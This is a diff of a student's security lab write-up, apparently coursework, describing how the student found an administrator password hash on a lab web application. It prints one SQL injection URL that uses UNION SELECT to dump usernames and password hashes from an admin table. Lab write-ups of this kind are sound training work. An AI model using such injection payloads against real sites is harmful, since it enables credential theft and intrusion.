gabequinto/SEC335/Lab9.2.md

 ![admin login](https://user-images.githubusercontent.com/78443183/163469045-d16b5b3c-679a-4d5c-8af8-57a8588a2f39.PNG)

 ##### Finding the Administrator Password
-Follwing this I found through research that there was a way to use sqli to expose the has of the root password.
+Follwing this I found through research that there was a way to use sqli to expose the hash of the root password.
 To do this I entered ` https://10.0.5.31/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;`
 as seen in the screenshot below.

 ![admin foothold](https://user-images.githubusercontent.com/78443183/163469101-7e60ebbc-db8c-483c-88a8-51e8ae88fad0.PNG)